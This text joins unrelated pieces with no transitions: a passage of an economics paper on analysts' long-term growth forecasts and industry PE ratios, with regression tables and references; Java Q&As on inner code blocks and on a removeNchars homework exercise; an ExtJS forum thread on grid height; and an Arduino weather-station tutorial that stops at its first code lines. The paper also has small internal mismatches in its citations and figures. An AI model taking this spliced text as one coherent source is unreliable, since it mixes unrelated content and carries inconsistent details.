For each quarterly observation, firms are grouped into portfolios using two alternative levels of aggregation. In the more aggregated case, firms are grouped into 11 sectors, which are broad economic groupings as defined by I/B/E/S (Consumer Services, Technology, etc.). The second portfolio grouping is comprised of industry-level portfolios, constructed using I/B/E/S industry codes that are similar in detail to the old 2-digit Standard Industrial Classification (SIC) industry groupings. For instance, the technology sector is broken down into (i) computer manufacturers, (ii) semiconductors and components, (iii) software and EDP services, and (iv) office and communication equipment.

Each quarterly observation for each variable is constructed by aggregating over all portfolio members in that quarter – S&P500 firms in the given sector (or industry). Constructing a portfolio aggregate long-term growth forecast is somewhat tricky because these variables are growth rates and because there is no clearly optimal set of weights for aggregating growth rates. The most intuitive choice would be the level of a firm's previous-year earnings; but this would be nonsensical in the case where some firms had negative earnings. To get around this, I use a measure of expected earnings; in particular, each firm's weight is calculated as current shares times the maximum of [EPS1, EPS2, 0]. Because EPS2 is almost always positive for S&P500 firms, this approach avoids the problem of potentially negative weights and minimizes the number of companies that get zero weight.

The dependent variable, the price-earnings ratio, is constructed by summing up the market values of all (S&P500) sector or industry members, and then dividing by the sum of their expected 12-month-ahead earnings. Similarly, dividend payout rates at the portfolio level are constructed by summing the dividends (dividends per share times shares outstanding) of portfolio members and dividing by the sum of their 12-month lagging earnings. The payout rate and the PE ratio are undefined when their denominators are negative; thus, these variables are occasionally undefined when we use the finer industry-level portfolio partition. Moreover, there is a higher frequency of negative observations on 12-month lagging earnings than on 12-month-ahead earnings (presumably owing to analysts' optimistic bias); that is, actual earnings are negative more often than expected earnings. To reduce the loss of industry-level observations as a result of negative earnings, in constructing industry payout ratios I substituted an industry's 12-month-ahead earnings for its 12-month lagging earnings in cases where the latter is negative and the former is not, with little effect on the results.
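A minimal Python sketch of these aggregation rules (my own; the firm-level numbers are made up) may help fix ideas:

# Illustrative only: portfolio-level growth forecast and PE ratio.
# Each tuple: (shares, price, EPS1, EPS2, 12-month-ahead EPS, growth forecast)
firms = [
    (100, 30.0,  2.00, 2.20,  2.02, 0.12),
    (200, 15.0, -0.50, 0.40, -0.43, 0.18),  # negative EPS1: weight uses EPS2
]

# Growth weights: shares * max(EPS1, EPS2, 0) -- never negative
w = [sh * max(e1, e2, 0.0) for sh, _, e1, e2, _, _ in firms]
growth = sum(wi * g for wi, (_, _, _, _, _, g) in zip(w, firms)) / sum(w)

mkt_value = sum(sh * p for sh, p, *_ in firms)
earn_ahead = sum(sh * e for sh, _, _, _, e, _ in firms)
pe = mkt_value / earn_ahead   # observation discarded if the denominator <= 0
# The payout rate is built analogously: total dividends over total
# 12-month lagging earnings of the portfolio members.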
3.3 Controls for expected returns

Because empirical inferences are partly drawn from the time series dimension of the data, I include a couple of proxies for the expected long-run return on the market portfolio, specifically the long-term (10-year) government bond yield and the risk spread on corporate bonds, equal to the difference between the yields on the Moody's Aaa and Baa corporate bond indexes. In light of the findings by Fama and French (1989) and others, that excess expected equity returns are positively related to the risk spreads on bonds, we expect the PE ratio to be negatively related to both the corporate risk spread and the bond yield.

A third macro factor I consider is the expected inflation rate, as proxied by the four-quarter expected inflation rate from the Philadelphia Federal Reserve survey of professional forecasters. As suggested in Sharpe (2001), expected inflation also appears to be a positive factor in required equity returns (before taxes), perhaps because inflation raises the effective tax rate on real equity returns.

I do not construct a measure of the industry or sector portfolio betas, or any other cross-sectional determinants of expected returns. First, the bulk of empirical research weighs in on the side of finding very little role for beta. Perhaps the most salient study in this regard is Gebhardt, Lee, and Swaminathan (2001), which also analyzes expected returns with an earnings-based ex ante measure. They find beta to be of little value in explaining cross-sectional differences in expected return. On the other hand, their findings suggest that industry membership is a factor in expected returns; I control for potential industry factors in expected returns by including fixed industry effects.³
³ Indeed, Gebhardt et al. find the long-term growth forecast to be a positive factor in firm-level expected returns. But that finding might be the result of assumptions they use to construct their ex ante measure of expected return. If their measure builds in too long a horizon on the growth forecast, then the growth forecast will appear to have a positive effect on expected return (or a negative effect on valuations). In their "terminal value" calculation, the slow decay rate of ROE, and the use of median industry ROE as the expected ROE for perpetuity, may implicitly build in too long a horizon on current expected earnings growth or, more precisely, on the value of ROE in year t+4. Indeed, it is somewhat curious that long-term growth is a significant factor in expected return only when the regression also includes the book-to-market ratio – another key component in the construction of the dependent variable.

3.4 Sample Statistics

After dropping the first observation per sector or industry in order to create one lag on the PE ratio, the sample runs from 1983:Q2 to 2001:Q2. This leaves a potential of 73 quarterly observations for each of 11 sectors, or 803 sector-time observations. In addition to excluding observations for which earnings are negative or dividends are zero, those with extreme values are also filtered out. In particular, observations are excluded if either the portfolio PE ratio exceeds 300 or its dividend payout rate exceeds 5.0. In the case of sector portfolios, these filters remove only 2 observations; and no observations are lost as a result of negative earnings or zero dividends.

Distributions of the key variables for the sector portfolios are depicted by the top number among each pair of numbers in table 1. The average sector price-earnings ratio over the sample period is about 14, and it ranges from 3.5 to 54.1. The average dividend payout rate is 0.45 (or 45 percent of earnings), with a range of 0.08 to 2.16. The average expected long-term growth rate is 11 percent, with a range of 5 to 20 percent. Correlations among variables are shown in the bottom half of the table. The PE ratio is strongly correlated with the earnings growth forecast, as theory would suggest, but it is essentially uncorrelated with the dividend payout rate. The earnings growth forecast is negatively correlated with the dividend payout rate, consistent with the prediction that firms with lower growth prospects pay out a higher proportion of their earnings.

In the case of industry portfolios, roughly 120 observations are excluded where industry dividends are zero or, in a handful of cases, where expected year-ahead earnings are negative, leaving 4071 observations on 66 industries.⁴ Another 14 observations are excluded because the PE ratio exceeds 300 or the dividend payout rate exceeds 5, leaving 4057 industry-quarter observations, an average of about 62 quarters per industry. Distributions and correlations for the industry portfolio variables are depicted by the bottom figures among the pairs in table 1.
⁴ I have also excluded 5 very small industries for which the average total industry market value (over the sample period) is less than $1 billion. Also note that not all industries exist over the entire sample.

4. Empirical Results

4.1 Sector Regressions

Table 2 shows the results of sector portfolio regressions with the log of the PE ratio as dependent variable. Heteroskedasticity- and autocorrelation-consistent (Newey-West) standard errors are reported below the coefficient estimates. Column (1) shows the simplest specification; it includes the earnings growth forecast, the sector payout rate, the yield on the 10-year Treasury bond, and the risk spread on corporate bonds. The coefficient estimate on the growth forecast is 8.05, with a standard error of 0.5, indicating relatively high precision. The magnitude of the coefficient suggests that growth forecasts reflect expectations over a fairly long horizon. In particular, given that β(T) equals 7.75 for T=10 and 8.5 for T=11, the inference would be that the long-term growth forecast represents the expected growth rate for a 9 or 10 year period, starting from the coming year's expected level of earnings.

The coefficient on the payout rate, 0.34, falls within the [0,1] range dictated by theory; but, interpreted literally, the magnitude of the coefficient implies that payout rates adjust very slowly toward their long-run desired levels. Interpreted more loosely, one could infer that the current payout rate conveys some information about a sector's long-run desired payout rate, which is not likely to be constant over the very long run as assumed by the model. The coefficients on the bond yield and the risk spread are both negative, as theory and previous empirical results would predict. The coefficient on the Treasury bond yield implies that a one percentage point increase in long-term yields drives down the PE ratio by about 12 percent – or, holding E constant, drives down the stock price 12 percent. The regression R-squared is quite high, suggesting these four variables explain about 70 percent of the overall cross-sectional and time series variation in price-earnings ratios. The root mean squared error is 0.2.

One problem with this specification, however, is the presence of strong autocorrelation in the errors, reflected in a Durbin-Watson statistic of 0.32. In specification (2), this is rectified by modeling the dynamics with the addition of a lagged dependent variable, the lagged PE ratio, which receives a coefficient of 0.75. Not surprisingly, adding this regressor boosts the R-squared substantially, to 0.910, and cuts the root mean squared error in half. The Durbin-h test now strongly rejects the presence of autocorrelation. Interpreting the coefficient on the growth forecast is a bit more complicated here because that coefficient, equal to 2.00, now represents only the "impact effect". The total long-run effect of a change in the growth forecast is equal to the impact coefficient divided by one minus the coefficient on the lagged PE, or 2/(1−0.75) = 8. Thus, the conclusion from the original regression holds up: the growth forecast still appears to represent a horizon of about 9 years.
The long-run effect of the payout rate is 0.28, only a bit smaller than the static estimate. One notable difference from the static model is that the sign on the risk spread flips to positive, although that variable is no longer statistically significant. Thus, once we account for growth expectations and the underlying dynamics, the risk spread no longer has marginal explanatory power for stock valuations.

The third and fourth specifications address the potential omitted variable problem. Gebhardt et al. (2001) find sector-level factors in expected returns. If sector-level (but non-growth-related) factors are correlated with sector long-term growth expectations, then the coefficient on growth forecasts will be biased. Sector-level expected-return factors can be removed using a fixed effects estimator. In column (3), results are shown for the static version of the model estimated on sector-mean-adjusted variables; and, in (4), results are shown when fixed effects are similarly incorporated into the dynamic model. In both cases, the results continue to yield conclusions similar to the first specification.⁵

⁵ Given the sample size, the small sample bias that arises when a lagged dependent variable is used in conjunction with fixed effects should not be an issue.

Finally, I consider the possibility that omitted macroeconomic factors in expected returns are correlated with changes in the average sector growth forecast over time. Column (5) shows the results from adding expected inflation, specifically, expected inflation over the next four quarters as measured by the Philadelphia Fed survey of professional forecasters. As shown by Sharpe (2001), expected inflation seems to be related to both expected earnings growth and expected returns. In addition, controlling for expected inflation allows us to interpret the estimated effect of changes in expected long-term growth as reflecting changes in real growth expectations. In any case, adding expected inflation to the dynamic specification somewhat reduces the estimated effect of expected growth. Here, the long-run effect of 6.63 is consistent with a horizon between 7 and 8 years.

The final specification takes a more agnostic approach to macro factors and adds year dummies (in addition to the fixed sector effects). This eliminates any effect of the growth forecast that might be purely time-driven, and thus provides the most conservative estimate of the effect of these earnings expectations. Indeed, the long-run coefficient on the growth forecast falls to 5.45 in this regression, which suggests a horizon of about 6 years. Considering the totality of the findings in table 2, one would conclude that the horizon of the earnings growth forecast falls somewhere in the range of 6 to 10 years.
4.2 Industry Regressions

An analogous set of results based on narrower industry-level portfolios is shown in table 3. The industry-level results generally follow the pattern of the sector-portfolio results, with one important difference. In these regressions, the long-run coefficient on the growth forecast tends to be about two-thirds the magnitude found in the analogous sector-level regressions. In particular, the coefficient estimate on the growth forecast runs from 5.4 in the specifications without fixed effects down to 3.9 in the specification with both fixed industry and time effects. These results would suggest that investors apply the growth forecast to a somewhat shorter horizon – between 5 and 7 years, compared to the 6 to 10-year range suggested by the sector-level analysis.

One potential explanation of the difference between the sector- and industry-level coefficient estimates revolves around the idea that the analyst growth forecasts measure investor expectations with error. Assuming minimal measurement error on other regressors, measurement error in the growth forecast would produce a downward bias in the coefficient on expected growth. Furthermore, if measurement errors were not highly correlated across firms or industries within a given sector, then using a higher level of aggregation would tend to reduce this measurement error. A similar but more structural explanation for the difference in results could be that investor expectations of a firm's or industry's growth beyond the very near term are partly reflected in growth expectations for other firms or industries within the same sector. Under either interpretation, we would expect sector growth forecasts to help explain variation in industry PE ratios, even after controlling for the industry growth forecast.

This hypothesis can be examined by reestimating the industry regressions with the sector growth forecast as an additional explanatory variable. With both the industry and sector growth forecasts in the regression, the sum of their two coefficients can be interpreted as measuring the total effect of an increase in forecasted industry growth that is matched by an equal-sized increase in the forecast for sector-level growth. The key results from re-estimating specification (1) are provided in the first column of Table 4. As shown, the coefficients on the industry and sector growth forecasts are 4.35 and 1.87, respectively. These two coefficients sum to 6.22, which is larger than the original industry growth effect from the analogous industry-level regression (table 3), though still smaller than the coefficient in the sector-level regression (table 2). Results from rerunning specification (4) are shown in the second column. The estimated (long-run) coefficients on industry and sector growth forecasts are 3.62 and 3.41, respectively. Thus, it again appears that sector growth expectations help explain industry valuations. Here, the coefficients sum to a total effect of 7.03, which is closer to the long-run coefficient on growth in the sector regression (7.92) than to that in the industry regression (4.53).⁶

⁶ An alternative tack, which amounts to the same test, would be to put in the regression the industry growth forecast and, second, the differential between the sector and industry growth forecasts. In this case, the coefficient on the industry growth forecast would be 7.02, and the coefficient on the differential would be 3.4.

4.3 Robustness over time

As a final robustness test of the model and its application to the analyst forecast data, I split the data into early (1983-1991) and late (1992-2001) subsamples and reestimate some of the key industry- and sector-level regressions. This experiment provides evidence on the extent to which our inferences depend upon the time period under consideration. Table 5 compares the coefficient estimates on the long-term growth forecast for the two time periods, under four alternative specifications (regressions (1) and (4) for both the sector and industry portfolios). Although not shown in the table, the coefficient on the dividend payout rate is always positive and less than 0.5, while the coefficient on the Treasury bond yield is always negative.

In short, the results do indicate a substantial difference between the early- and late-sample valuation effects of long-term growth forecasts. Although statistically positive in all cases, the coefficient on the growth forecast in the later subsample is about double the analogous early-sample estimate. For instance, in the simple sector regression (1), the early-sample coefficient on growth is 6.1, whereas the late-sample coefficient is 10.0. This suggests that the horizon in the early sample is about 7 years, whereas it is closer to 12 years in the more recent period. At the other end of the spectrum, the dynamic fixed-effect regression (4) on industry portfolios produces a long-run coefficient of 2.3 in the early period, suggesting a 2 to 3 year horizon, versus 4.5 in the late period, consistent with a 5-year horizon.⁷ We are thus led to the inference that long-term growth forecasts carried more weight, or were applied to a longer horizon, during the past decade. This could owe either to the fact that analyst forecasts have become more widely applied in valuation analysis or to an increased emphasis placed on these long-term growth forecasts by analysts and their customers.
⁷ While the "discount" or weighting factor [\rho = P/(P+D)] used in the model approximation should be somewhat smaller in the early period, due to the higher average dividend yield in the 1980s, the difference would not be nearly enough to justify the difference in coefficient estimates.

4.4 Caveats

Before concluding, some cautionary remarks are in order. It should be emphasized that the interpretation of the results is conditioned upon the maintained hypothesis that the assumptions behind the model are a reasonable approximation of reality. While this is true of any econometric application, it is important here because the conclusions revolve around the magnitude of the key coefficients, rather than just their sign and statistical significance. Clearly, there are a number of rationales one could invoke for why the model might be prone to either overestimate or underestimate the forecast horizons imputed to investors.

On one hand, the analysis ignores the potential influence of momentum, or positive-feedback, trading, which would cause stock prices to overreact to fundamentals. In other words, if stock prices in an industry rise due to an increase in the growth outlook over the next few years, momentum trading could amplify the ultimate stock price effect. In that case, the model would overstate the duration that investors actually attribute to growth forecasts. On the other hand, it is possible that the required return on a firm's or industry's stock is positively related to its expected growth rate, since high-growth firms or industries may be riskier. This would imply the presence of a second (negative) channel through which growth expectations might influence PE ratios, making identification problematic. If we fail to control for any such negative effect on stock prices coming through a required-return channel, the model would underestimate the imputed horizon of these forecasts, by underestimating their positive influence owing to their role as proxies of expected growth.
5. Summary and Implications

The empirical analysis strongly confirms the value-relevance of analysts' long-term earnings growth forecasts. In particular, most regression coefficient estimates suggest that a 1 percentage point increase in expected earnings growth can explain a 4 to 8 percent boost in an industry's PE ratio. According to the model, these regression coefficients imply that the market treats these forecasts as having an applicable horizon of at least 5 years, and perhaps as many as 10 years. Results from splitting the sample indicate that long-term growth forecasts had larger valuation effects during the past decade than they did in the previous decade, which suggests that the upper-end estimates (the 10-year horizon) may be more relevant for the more recent period. In light of the 4 percentage point increase in the "bottom-up" growth forecast for the S&P500 during the latter half of the 1990s (documented in figure 1), these findings suggest that the increase in long-term growth expectations might account for as much as a 32 percent (8 × 4%) rise in the market PE ratio over those years, about half of the total increase.

The empirical relation between equity valuations and long-term growth forecasts suggests that investors view such forecasts as strong indicators of growth prospects for several years. It would thus appear that the market places a great deal of faith in the ability of analysts to divine differences in firm or industry long-term prospects; but this raises the question: how good are such longer-term growth predictions? A detailed analysis of this issue is beyond the scope of my study; however, some recent research suggests that investors could well be misguided in putting so much weight on these forecasts. One finding is that long-term forecasts are not only upward biased, like forecasts on more specific, shorter-term horizons, but they also appear to be "extreme"; that is to say, the higher a growth forecast is, the more upward biased it tends to be [Dechow and Sloan (1997), Rajan and Servaes (1997)]. In addition, there is mixed support for the view that analysts over-extrapolate from recent observations [De Bondt (1992), La Porta (1996)].

If the weight placed on these forecasts overreaches the ability of analysts (and perhaps anyone else) to predict long-run performance, the forecasts should be contrary indicators of future stock performance. Indeed, these studies find that stock returns for firms with high long-term growth forecasts tend to be substandard. In an analysis of long-term growth forecasts issued from 1982-1984, De Bondt (1992) finds a significant inverse relation between expected growth and excess returns over the subsequent 12-18 months. La Porta's (1996) analysis of forecasts issued from 1982-1991 finds subsequent stock returns to be negatively related to beginning-of-period long-term growth forecasts; and both Rajan and Servaes (1997) and Dechow, Hutton and Sloan (2000) find that post-offering performance of IPO stocks is worse for firms with higher long-term growth forecasts.

Finally, Chan, Karceski and Lakonishok (2003) offer some very interesting evidence on the efficacy of long-term growth forecasts. In particular, they compare realized growth to forecasted growth for firms sorted annually into quintile portfolios based on their I/B/E/S long-term growth forecasts. On average over their sixteen-year sample, the median growth rate forecast in the top quintile is 22.4 percent, compared to a median of 6 percent in the bottom quintile, a spread of 16-1/2 percentage points. They compare this spread with the spread between the median growth rates actually experienced in subsequent years. Their calculations imply that, from year 2 through 5, the median realized growth rates in the top and bottom quintiles differed by 5-1/2 percentage points, only a third of the average forecasted differential.⁸

⁸ They find that, in the first year after the forecast, median realized growth in operating income for those quintiles was 16 percent and 3-1/2 percent, a spread of 12-1/2 percentage points, about three-fourths of the expected spread. But the spread in median realized growth narrows to 7 points when the performance period is extended to 5 years. Backing out the strong contribution from the first year yields an implied average growth differential in the subsequent four years (years 2-5) of about 5-1/2 percent.

On average, my coefficient estimates suggest that industry portfolios are valued as if the market believes that the differential in long-term growth forecasts should be applied to a six- to seven-year horizon. Of course, there are alternative interpretations of my regression estimates. One possibility is that investors (correctly) expect only a third of the differential between growth forecasts to be realized, but that they apply that smaller differential over a much longer horizon. To rationalize this interpretation, though, investors would need to expect the reduced differential to persist for over 20 years. Such beliefs would appear to fly in the face of another finding by Chan, Karceski and Lakonishok (2003), that there is remarkably little long-term persistence in firm-level income growth. All this would seem to indicate that, even if using the long horizons suggested by my estimates produces more accurate measures of investors' expected returns, using such horizons would seem to be an ill-advised strategy for making portfolio investment decisions.

Like the evidence on stock returns and growth forecasts discussed earlier, the analysis by Chan, Karceski and Lakonishok (2003) is largely focused on the cross-sectional informativeness of growth forecasts. To complete the picture, an important direction for future research would involve focusing on the efficacy of the time-series information in long-term growth forecasts, measured by changes in such forecasts for a given firm or industry.
References

Campbell, John Y., and Robert Shiller. 1988. "Stock Prices, Earnings, and Expected Dividends." Journal of Finance 43 (July): 661-671.

Campbell, John Y., and Robert Shiller. 1989. "The Dividend-Price Ratio and Expectations of Future Dividends and Discount Factors." Review of Financial Studies 1: 195-228.

Chan, Louis K.C., Jason Karceski, and Josef Lakonishok. 2003. "The Level and Persistence of Growth Rates." Journal of Finance 58 (April): 643-684.

Claus, James, and Jacob Thomas. 2001. "Equity Premium as Low as Three Percent? Empirical Evidence from Analysts' Earnings Forecasts for Domestic and International Stock Markets." Journal of Finance 56 (October): 1629-1665.

De Bondt, Werner F.M. 1992. Earnings Forecasts and Share Price Reversals. Charlottesville, Virginia: The Research Foundation of the Institute of Chartered Financial Analysts (Monograph).

Dechow, Patricia M., Amy P. Hutton, and Richard G. Sloan. 2000. "The Relation between Analysts' Forecasts of Long-term Earnings Growth and Stock Price Performance Following Equity Offerings." Contemporary Accounting Research 17 (Spring).

Gebhardt, William R., Charles M.C. Lee, and Bhaskaran Swaminathan. 2001. "Toward an Implied Cost of Capital." Journal of Accounting Research 39 (June): 135-177.

Harris, Robert S., and Felicia C. Marston. 1992. "Estimating Shareholder Risk Premia Using Analysts' Growth Forecasts." Financial Management 21 (Summer): 63-70.

Harris, Robert S., and Felicia C. Marston. 2001. "The Market Risk Premium: Expectational Estimates Using Analysts' Forecasts." Mimeo.

Khorana, Ajay, R. Charles Moyer, and Ajay Patel. 1999. "The Ex Ante Risk Premium: More Pieces of the Puzzle." Georgia Institute of Technology (working paper).

La Porta, Rafael. 1996. "Expectations and the Cross-Section of Returns." Journal of Finance 51 (December): 1715-1742.

Lee, Charles M.C., James Myers, and Bhaskaran Swaminathan. 1999. "What Is the Intrinsic Value of the Dow?" Journal of Finance 54 (October): 1693-1741.

Nelson, William R. 1999. "The Aggregate Change in Shares and the Level of Stock Prices." Finance and Economics Discussion Series no. 1999-08, Federal Reserve Board.

Rajan, Raghuram, and Henri Servaes. 1997. "Analyst Following of Initial Public Offerings." Journal of Finance 52 (June): 507-529.

Sharpe, Steven A. 2002. "Reexamining Stock Valuation and Inflation: The Implications of Analysts' Earnings Forecasts." Review of Economics and Statistics 84 (November): 632-649.
Table 1
Sample Statistics for Sector Portfolios (top figure in each pair) and Industry Portfolios (bottom figure)

              Mean    Std. Dev     Min      Max
P/E           14.2       5.8        3.5     54.1
              14.9       7.5        3.0    127.3
Payout        0.45      0.20       0.08      2.2
              0.41      0.28       0.01      4.1
Growth        0.112     0.03       0.05     0.20
              0.149     0.03       0.03     0.27

Pearson Correlation Coefficients

               P/E     Payout
Payout         0.15     1.00
               0.02     1.00
Growth         0.45    -0.44
               0.30    -0.33

The sample runs quarterly from 1983:Q2 to 2001:Q2. In the more aggregated portfolios, there are 801 observations on 11 sectors; the second sample has 4071 observations on 66 industries.
Table 2
Sector Portfolio Regressions: Dependent variable is the sector-level log PE ratio*

                           (1)       (2)       (3)       (4)       (5)       (6)
Growth (β)                8.05      2.00      9.69      2.66      2.30      1.69
                         (0.50)    (0.55)    (1.05)    (0.77)    (0.70)    (0.70)
β/(1−λ)                     --      8.00        --      7.92      6.63      5.45
Payout Rate               0.34      0.07      0.31      0.07      0.09      0.09
                         (0.05)    (0.03)    (0.08)    (0.04)    (0.04)    (0.04)
10-Year Treasury Yield  -11.99     -3.99    -11.84     -4.73     -2.86        --
                         (0.63)    (0.78)    (0.52)    (0.67)    (0.57)
Risk Spread              -9.90      3.41     -8.82      2.84        --        --
                         (4.02)    (1.92)    (3.27)    (1.78)
Expected Inflation          --        --        --        --     -5.18        --
                                                                 (1.04)
Lagged PE (λ)               --      0.75        --      0.67      0.65      0.69
                                   (0.06)              (0.05)    (0.05)    (0.06)
Adj. R-Squared            .706      .910      .714      .889      .893      .764
Root MSE                  .204      .113      .172      .107      .106      .085

* 801 sector-time observations on 11 sectors over 1983:Q2 to 2001:Q2. Specifications (1) and (2) are estimated with OLS; fixed sector effects are added in (3)-(6) by using OLS on sector-mean-adjusted values; year dummies are added in (6). Newey-West standard errors are reported in parentheses.
Table 3
Industry Portfolio Regressions: Dependent variable is the industry-level log PE ratio*

                           (1)       (2)       (3)       (4)       (5)       (6)
Growth (β)                5.39      0.91      5.06      1.36      1.20      1.00
                         (0.37)    (0.16)    (0.36)    (0.21)    (0.20)    (0.22)
β/(1−λ)                     --      5.45        --      4.53      3.96      3.88
Payout Rate               0.15      0.04      0.20      0.07      0.08      0.07
                         (0.02)    (0.01)    (0.02)    (0.01)    (0.01)    (0.01)
10-Year Treasury Yield  -10.59     -2.87    -10.33     -3.98     -2.38        --
                         (0.54)    (0.27)    (0.38)    (0.28)    (0.30)
Risk Spread              -5.93      4.36     -6.83      2.26        --        --
                         (3.33)    (1.30)    (2.13)    (1.31)
Expected Inflation          --        --        --        --     -3.96        --
                                                                 (0.67)
Lagged PE (λ)               --      0.83        --      0.71      0.70      0.74
                                   (0.02)              (0.02)    (0.02)    (0.03)
Adj. R-Squared            .421      .857      .510      .792      .794      .699
Root MSE                  .311      .155      .226      .147      .146      .12

* 4057 industry-time observations on 66 industries over 1983:Q2-2001:Q2. Specifications (1) and (2) are estimated with OLS; fixed industry effects are added in (3)-(6) by using OLS on industry mean-adjusted values; year dummies are added in (6). Newey-West standard errors are reported in parentheses.
Table 4
Sector Growth Effects in Industry Portfolio Regressions

Coefficient on:        (1)      (4)
Industry Growth        4.35     3.62
Sector Growth          1.87     3.40
Total                  6.22     7.02

Coefficients on the growth forecasts are all significant at the 1 percent level. Figures under specification (4) refer to implied long-run effects of growth, analogous to those in column (4) of tables 2 and 3.
Table 5
Coefficients on Growth in Early and Late Samples

                   Sectors             Industries
                 (1)      (4)        (1)      (4)
1983-1991        6.1      2.9        4.0      2.3
1992-2001       10.0     10.6        6.5      4.5

Coefficients on the growth forecasts are all significant at the 1 percent level. Figures under specification (4) refer to implied long-run effects of growth, analogous to those in column (4) of tables 2 and 3.
public class MyTestClass {
public static void main(String[] args) {
new MyTestClass().myMethod();
}
public void myMethod(){
{
//do something
}
{
//do something
}
{
//do something
}
}//method close
}//class close
It is not common practice to do this kind of thing, and I wouldn't do it normally.
Those inner blocks (i.e. { ... }) can serve a couple of purposes:
Blocks limit the scope of any variables declared within them; e.g.
public void foo() {
    int i = 1;
    {
        int j = 2;
    }
    // Can't refer to the "j" declared above here. But can declare a new one.
    int j = 3;
}
However, I wouldn't recommend doing this. IMO, it's better to use different variable names OR refactor the code into smaller methods. Either way, most Java programmers would regard the { and } as annoying visual clutter.
Blocks can be used to attach labels.
HERE: {
    ...
    break HERE;  // breaks to the statement following the block
    ...
}
However, in practice you hardly ever see labelled break statements. And because they are so unusual, they tend to render the code less readable.
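For completeness, here is a small self-contained example of a labelled block with break (the class name and values are invented for illustration):

public class LabeledBlockDemo {
    public static void main(String[] args) {
        SEARCH: {
            int[] values = {4, 8, 15, 16};
            for (int v : values) {
                if (v == 15) {
                    System.out.println("found 15");
                    break SEARCH;  // jumps to the first statement after the block
                }
            }
            System.out.println("skipped when the break fires");
        }
        System.out.println("after the labelled block");
    }
}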
Unanswered: infinite scroll grid height
Is there a way to have the height of an infinite scroll grid shrink to fit the number of rows when the store returns fewer records than would be required to fill the configured height?
Not that I am aware of. I have used the following in previous apps, perhaps it may help:
Code:
// call on grid afterlayout / resize
calculatePageSize: function() {
    if (!this.rendered) {
        return false;
    }
    var row = this.view.getRow(0);
    var rowHeight;
    if (!row) {
        rowHeight = 41;
    } else {
        rowHeight = Ext.get(row).getHeight();
    }
    var height = this.getView().scroller.getHeight();
    var ps = Math.floor(height / rowHeight);
    return (ps > 1 ? ps : false);
},
Scott.
I have the same problem and am searching for a solution.

@Scott, it seems your code is for Ext 3.x; the functions you are using are no longer available. If someone has a tip on how to access a row element from the view, I guess one could reuse your code, but I couldn't see a way to do it. DomQuery perhaps?
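Untested, but one way to adapt Scott's idea to Ext 4 might be via the view's getNode() (assuming your version exposes it; check the docs for your exact release):

// Rough Ext 4 sketch (untested): derive a page size from the first row's height.
calculatePageSize: function () {
    if (!this.rendered) {
        return false;
    }
    var view = this.getView(),
        rowEl = view.getNode(0),  // DOM element of the first row, if rendered
        rowHeight = rowEl ? Ext.fly(rowEl).getHeight() : 41,
        ps = Math.floor(view.getHeight() / rowHeight);
    return ps > 1 ? ps : false;
}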
I have finished the part of finding the char at the position my homework requires, but how do I delete the character I found from the String?
removeNchars takes a String, an int and a char and returns a String: the output string is the same as the input string except that the first n occurrences of the input char are removed, where n is the input integer. If there are not n occurrences of the input character, then all occurrences of the character are removed. Do not use arrays to solve this problem.
HW2.removeNchars("Hello there!", 2, 'e') "Hllo thre!"
HW2.removeNchars("Hello there!", 10, 'e') "Hllo thr!"
HW2.removeNchars("Hello there!", 1, 'h') "Hello tere!"
public class HW2 {
    public static String removeNchars(String s, int a, char b) {
        StringBuilder s = new StringBuilder();       // won't compile: 's' is already the parameter name
        for (int i = 0; i < s.length(); i++) {
            if (int i = a && s.charAr(i) == b) {     // won't compile: malformed condition, and the method is charAt
                // do something
            }
        }
    }
}
There is more than one way to do it. Since you already used StringBuilder, try this: the idea is to define a StringBuilder from the input string,
StringBuilder sb = new StringBuilder(inputString);
use deleteCharAt() to delete the char you don't want (see the docs),
and convert it back to a string:
String resultString = sb.toString();
good luck
Edit:
You can also create a new StringBuilder (for example, named output), then iterate over the source string and append the chars you don't want to remove to the output with append().
something like this:
StringBuilder output = new StringBuilder();
output.append(c);  // append each character you decide to keep
and return the output string after you finish iterating.
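Putting those pieces together, a complete version of this append-based approach could look like the following (the variable names are my own):

public class HW2 {
    public static String removeNchars(String s, int n, char c) {
        StringBuilder output = new StringBuilder();
        for (int i = 0; i < s.length(); i++) {
            char current = s.charAt(i);
            if (current == c && n > 0) {
                n--;                       // drop this occurrence
            } else {
                output.append(current);    // keep everything else
            }
        }
        return output.toString();
    }

    public static void main(String[] args) {
        System.out.println(removeNchars("Hello there!", 2, 'e'));  // Hllo thre!
    }
}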
I don't know why you are using the StringBuilder class, but given what you stated above, I think this will help you with your homework. Let's see if it works for you.
public static String removeNchars(String s, int a, char b){ String str = ""; for(int i = 0; i < s.length(); i++){ if(a > 0 && s.charAt(i) == b) { a--; }else { str += s.charAt(i); } } return str; }
You can use deleteCharAt() like this (note that the StringBuilder must not reuse the parameter name, and the index should only advance when nothing was deleted):

public class HW2 {
    public static String removeNchars(String s, int n, char c) {
        StringBuilder sb = new StringBuilder(s);
        int i = 0;
        while (i < sb.length() && n > 0) {
            if (sb.charAt(i) == c) {
                sb.deleteCharAt(i);  // the next char shifts into position i
                n--;
            } else {
                i++;
            }
        }
        return sb.toString();
    }
}
🌄 How to make a weather station (Arduino project)
We will need:
- Arduino UNO or another compatible board;
- temperature and humidity sensor DHT11 or other;
- a BMP085 pressure sensor, the more modern BMP180, or similar;
- MQ135 carbon dioxide sensor (optional);
- LCD display 1602 or other;
- 10 kΩ potentiometer;
- a case for the weather station;
- a piece of copper-clad fiberglass laminate (for the PCB);
- screws for fastening components;
- connecting wires;
- power supply connector;
- soldering iron.
Instructions for creating a home weather station on Arduino
Selection of the case for the future weather station
First, you need to find a suitable case: all the components of the future room weather station must fit inside it. Such enclosures are sold in many electronics stores, or you can use any other enclosure you can find.
Plan how all the components will be placed inside. Cut a window to mount the LCD display if there is not one already. If you place the carbon dioxide sensor inside, note that it runs quite hot, so put it on the side opposite the other sensors or make it remote. Provide a hole for the power connector.
Components Used
- The 1602 LCD display uses 6 Arduino pins, plus 4 power pins (for the character display itself and the backlight).
- DHT11 temperature and humidity sensor connected to any digital pin. To read the values we will use the DHT11 library.
- The pressure sensor BMP085 is connected via the I2C interface to two Arduino pins: SDA to analog pin A4 and SCL to analog pin A5. Note that the sensor is powered from +3.3 V.
- The carbon dioxide sensor MQ135 is connected to one of the analog pins.
In principle, to assess the meteorological conditions, it is sufficient to have data on temperature, humidity, and atmospheric pressure, and a carbon dioxide sensor is not necessary.
Using all 3 sensors occupies 7 digital and 3 analog Arduino pins, not counting the power supply, of course.
Connection diagram of the weather station components
The wiring diagram of the weather station is shown in the figure; it is self-explanatory.
The weather station sketch
Let's write the Arduino sketch. Wherever possible, the code is supplied with detailed comments.
#include <dht11.h>
#include <LiquidCrystal.h>
